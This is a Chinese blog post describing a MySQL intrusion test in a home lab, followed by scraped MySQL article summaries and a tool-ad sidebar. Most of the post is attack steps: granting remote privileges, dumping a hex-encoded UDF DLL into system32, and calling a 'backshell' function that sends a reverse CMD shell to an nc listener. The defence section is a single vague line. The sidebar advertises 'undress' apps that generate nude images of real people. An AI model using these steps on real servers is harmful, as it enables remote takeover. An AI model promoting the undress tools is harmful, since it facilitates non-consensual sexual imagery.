bitsCN.com
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL的入侵测试已经防范,与大家一起分享。
总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。
正题之一
物理机:Win7
虚拟机:XP
给予mysql远程权限:
grant all privileges on *.* to 数据库账号@给予权限的IP identified by '数据库密码';
flush privileges;
给物理机远程权限:
物理机成功连接上:
执行侵入测试前(有图有真相):
执行侵入测试后(有图有真相):
重启前(有图有真相):
重启后(有图有真相):
正题之二:
远程登录之后写入代码,代码在yyd.txt当中,然后在MySql中写入文件:
Win7 打另外一个cmd,本地端口映射:nc -vv -l -p 端口号
虚拟机上:执行映射:select backshell("物理机IP",端口号);
这便执行了3306端口反弹CMD
(没图了。。。用到了一个nc软件执行的映射)
yyd.txt大概内容:
et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代码...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c://windows//system32//yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';
正题之三:
防范
感觉有点乱,主要是分享了两种方法入侵,但是防范那部分应该是XP上的MySql服务关闭,但是早XP上做了好多测试,左后XP被我弄挂掉了。。。。好丢脸,只好把Win7上的MySql服务拿出来了。
觉得主要还是远程连接的问题,“如果MySql不开启远程连接的话我们还是朋友”,开玩笑,如果MySql不开启远程连接的话入侵几率会小的很多。
bitsCN.com
MySQL: An Introduction to the World's Most Popular DatabaseApr 12, 2025 am 12:18 AMMySQL is an open source relational database management system, mainly used to store and retrieve data quickly and reliably. Its working principle includes client requests, query resolution, execution of queries and return results. Examples of usage include creating tables, inserting and querying data, and advanced features such as JOIN operations. Common errors involve SQL syntax, data types, and permissions, and optimization suggestions include the use of indexes, optimized queries, and partitioning of tables.
The Importance of MySQL: Data Storage and ManagementApr 12, 2025 am 12:18 AMMySQL is an open source relational database management system suitable for data storage, management, query and security. 1. It supports a variety of operating systems and is widely used in Web applications and other fields. 2. Through the client-server architecture and different storage engines, MySQL processes data efficiently. 3. Basic usage includes creating databases and tables, inserting, querying and updating data. 4. Advanced usage involves complex queries and stored procedures. 5. Common errors can be debugged through the EXPLAIN statement. 6. Performance optimization includes the rational use of indexes and optimized query statements.
Why Use MySQL? Benefits and AdvantagesApr 12, 2025 am 12:17 AMMySQL is chosen for its performance, reliability, ease of use, and community support. 1.MySQL provides efficient data storage and retrieval functions, supporting multiple data types and advanced query operations. 2. Adopt client-server architecture and multiple storage engines to support transaction and query optimization. 3. Easy to use, supports a variety of operating systems and programming languages. 4. Have strong community support and provide rich resources and solutions.
Describe InnoDB locking mechanisms (shared locks, exclusive locks, intention locks, record locks, gap locks, next-key locks).Apr 12, 2025 am 12:16 AMInnoDB's lock mechanisms include shared locks, exclusive locks, intention locks, record locks, gap locks and next key locks. 1. Shared lock allows transactions to read data without preventing other transactions from reading. 2. Exclusive lock prevents other transactions from reading and modifying data. 3. Intention lock optimizes lock efficiency. 4. Record lock lock index record. 5. Gap lock locks index recording gap. 6. The next key lock is a combination of record lock and gap lock to ensure data consistency.
What are common causes of poor MySQL query performance?Apr 12, 2025 am 12:11 AMThe main reasons for poor MySQL query performance include not using indexes, wrong execution plan selection by the query optimizer, unreasonable table design, excessive data volume and lock competition. 1. No index causes slow querying, and adding indexes can significantly improve performance. 2. Use the EXPLAIN command to analyze the query plan and find out the optimizer error. 3. Reconstructing the table structure and optimizing JOIN conditions can improve table design problems. 4. When the data volume is large, partitioning and table division strategies are adopted. 5. In a high concurrency environment, optimizing transactions and locking strategies can reduce lock competition.
When should you use a composite index versus multiple single-column indexes?Apr 11, 2025 am 12:06 AMIn database optimization, indexing strategies should be selected according to query requirements: 1. When the query involves multiple columns and the order of conditions is fixed, use composite indexes; 2. When the query involves multiple columns but the order of conditions is not fixed, use multiple single-column indexes. Composite indexes are suitable for optimizing multi-column queries, while single-column indexes are suitable for single-column queries.
How to identify and optimize slow queries in MySQL? (slow query log, performance_schema)Apr 10, 2025 am 09:36 AMTo optimize MySQL slow query, slowquerylog and performance_schema need to be used: 1. Enable slowquerylog and set thresholds to record slow query; 2. Use performance_schema to analyze query execution details, find out performance bottlenecks and optimize.
MySQL and SQL: Essential Skills for DevelopersApr 10, 2025 am 09:30 AMMySQL and SQL are essential skills for developers. 1.MySQL is an open source relational database management system, and SQL is the standard language used to manage and operate databases. 2.MySQL supports multiple storage engines through efficient data storage and retrieval functions, and SQL completes complex data operations through simple statements. 3. Examples of usage include basic queries and advanced queries, such as filtering and sorting by condition. 4. Common errors include syntax errors and performance issues, which can be optimized by checking SQL statements and using EXPLAIN commands. 5. Performance optimization techniques include using indexes, avoiding full table scanning, optimizing JOIN operations and improving code readability.
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool
Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.
Dreamweaver Mac version
Visual web development tools
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
